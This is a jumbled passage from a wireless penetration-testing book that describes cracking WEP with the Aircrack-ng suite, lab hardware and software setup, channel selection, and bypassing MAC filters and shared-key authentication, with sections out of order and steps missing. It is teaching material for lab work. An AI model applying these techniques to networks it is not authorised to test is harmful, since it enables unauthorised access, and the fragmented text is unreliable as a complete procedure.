“640 K is more memory than anyone will ever need.”  Bill Gates, Founder, Microsoft Even with the best of intentions, the future is always unpredictable. The WLAN committee designed WEP and then WPA to be fool proof encryption mechanisms but over time, both these mechanism had flaws, which have been widely publicized and exploited in the real world.

 

Here, we will look at each of these encryption protocols and demonstrate various attacks against them.

 

WEP encryption

 

The WEP protocol was known to be flawed as early as 2000, but surprisingly it is still continuing to be used and the access points still ship with WEP-enabled capabilities.

 

There are many cryptographic weaknesses in WEP and they were discovered by Walker, Arbaugh, Fluhrer, Martin, Shamir, KoreK, and many others. Evaluation of WEP from a cryptographic standpoint is beyond the scope of this book, as it involves understanding complex math. Here, we will look at how to break WEP encryption using readily available tools on the BackTrack platform. This includes the entire

Aircrack-Ng suite of tools— airmon-ng, aireplay-ng, airodump-ng, aircrack-ng, and others.

Let us now first set up WEP in our test lab and see how we can break it.

What just happened?

We set up WEP in our lab and successfully cracked the WEP key. In order to do this, we first waited for a legitimate client of the network to connect to the access point. After this, we used the

aireplay-ng tool to replay ARP packets into the network. This caused the network to send ARP replay packets, thus greatly increasing the number of data packets sent over the air. We then used aircrack-ng

to crack the WEP key by analyzing cryptographic weaknesses in these data packets.

Note that, we can also fake an authentication to the access point using the Shared Key Authentication  bypass technique, we learnt in the last chapter. This can come in handy, if the legitimate client leaves the network. This will ensure we can spoof an authentication and association and continue to send our replayed packets into the network.

 

Hardware requirements

 

We will need the following hardware to set up the wireless lab:.

.Two laptops with internal Wi-Fi cards: We will use one of the laptops as the victim in our lab and the other as the penetration tester’s laptop. Though almost any laptop would fit this profile, laptops with at least 3 GB RAM is desirable. This is because we may be running a lot of memory-intensive software in our experiments.

.

.One Alfa wireless adapter: We need a USB Wi-Fi card that can support packet injection and packet sniffing, and that is supported by Backtrack. The best choice seems to be the Alfa AWUS036H card from Alfa Networks as BackTrack supports this out-of-the-box. This is available on Amazon.com for a retail price of $34 at the time of writing.

.

.One access point: Any access point which supports WEP/WPA/WPA2 encryption standards would fit the bill. I will be using a D-LINK DIR-615 Wireless N Router for the purpose of illustration in this entire book. You can purchase it from Amazon.com where it is retailing at around $35 at the time of writing.

.An Internet connection: This will come in handy to perform research, download software, and for some of our experiments.

Software requirements

 

We will need the following software to set up the wireless lab:

 

.

.BackTrack 5: BackTrack can be downloaded from their official website located at http://www.backtrack-linux.org. The software is open source and you should be able to download it directly from the website.

.

.Windows XP/Vista/7: You will need any one of Windows XP, Windows Vista, or Windows 7 installed in one of the laptops. This laptop will be used as the victim machine for the rest of the book.

It is important to note that even though we are using a Windows-based OS for our tests, the techniques learnt can be applied to any Wi-Fi capable devices such as Smart Phones and Tablets, among others.

 

Installing BackTrack

 

Let us now quickly look at how to get up and running with BackTrack.

 

BackTrack will be installed on the laptop which will serve as the penetration tester’s machine for the rest of the book.

 

Important note on WLAN sniffing and injection

 

WLANs typically operate within three different frequency ranges-2.4 GHz, 3.6 GHz, and 4.9/5.0 GHz. Not all Wi-Fi cards support all these ranges and associated bands. As an example, the Alfa card, which we are using, only supports IEEE 802.11b/g. This would mean this card cannot operate in 802.11a/n. The key point here is that to sniff or inject packets in a particular band, your Wi-Fi card will need to support it.

 

Another interesting aspect of Wi-Fi is that in each of these bands, there are multiple channels. It is important to note that your Wi-Fi card can only be on one channel at any given moment. It is not possible to tune into multiple channels at the same time. The analogy I can give you is your car radio. You can tune it to only one of the available channels at any given time. If you want to hear something else, you will have to change the channel of the radio. The same principle applies to WLAN sniffing. This brings us to an important conclusion-we cannot sniff all channels at the same time, we will need to select which channel is of interest to us. What this means is, that if our access point of interest is on channel 1, we will need to set our card on channel 1.

 

Though we have addressed WLAN sniffing in the previous paragraphs, the same applies to injection as well. To inject packets on a specific channel, we will need to put the card radio on that channel.

 

Let’s now do some exercises on setting our card to specific channels, channel hopping, setting regulatory domains, power levels, and so on.

 

Time

 

　

 

Summary

 

In this chapter, we have made some key observations about WLAN protocols:

 

Management, Control, and Data frames are unencrypted and thus can be easily read by someone who is monitoring the air space. It is important to note here that the data packet payload can be protected using encryption to keep it confidential. We will talk about this in the next chapter.

 

We can sniff the entire airspace in our vicinity by putting our card into monitor mode.

 

As there is no integrity protection in Management and Control frames, it is very easy to inject these packets by modifying them or replaying them as is using tools such as

 

aireplay-ng

.

Unencrypted data packets can also be modified and replayed back to the network. If the packet is encrypted, we can still replay the packet as-is, as WLAN by design does not have packet replay protection.

 

In the next chapter, we will look at different authentication mechanisms which are used in WLANs such as MAC Filtering, Shared Authentication, and so on, and understand the various security flaws in them through live demonstrations

 

　

 

　

 

　

 

 

 

Bypassing WLAN Authentication

“A false sense of security is worse than being unsure.”Anonymous A false sense of security is worse than being insecure, as you may not be prepared to face the eventuality of being hacked.

 

Summary

 

In this chapter, we have learnt the following about WLAN authentication:

 

.

.Hidden SSIDs is a security through obscurity feature, which is relatively simple to beat.

.

.MAC address filters do not provide any security as MAC addresses can be sniffed from the air from the wireless packets. This is possible because the MAC addresses are unencrypted in the packet.

.

.Open Authentication provides no real authentication at all.

.

.Shared Key Authentication is bit tricky to beat but with the help of the right tools we can derive the store the keystream, using which it is possible to answer all future challenges sent by the access point. The result is that we can authenticate without needing to know the actual key.

In the next chapter, we will look at different WLAN encryption mechanisms-WEP, WPA, and WPA2, and look at the insecurities which plague them.